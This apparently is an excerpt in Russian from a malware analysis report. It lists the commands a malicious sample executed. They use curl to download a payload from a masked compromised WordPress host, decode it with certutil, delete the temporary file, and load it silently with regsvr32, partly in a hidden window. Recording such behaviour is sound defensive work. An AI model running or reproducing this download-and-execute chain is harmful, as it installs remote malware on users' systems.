Техническая информация
- '<SYSTEM32>\cmd.exe' /c curl "http://re#######inicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60®sv...
- '<SYSTEM32>\cmd.exe' /c curl "http://re#######inicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60®sv...' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -decode "%TEMP%\1.tmp" "%TEMP%\lk.tmp"
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\1.tmp"
- '<SYSTEM32>\timeout.exe' 60
- '<SYSTEM32>\regsvr32.exe' /s "%TEMP%\lk.tmp"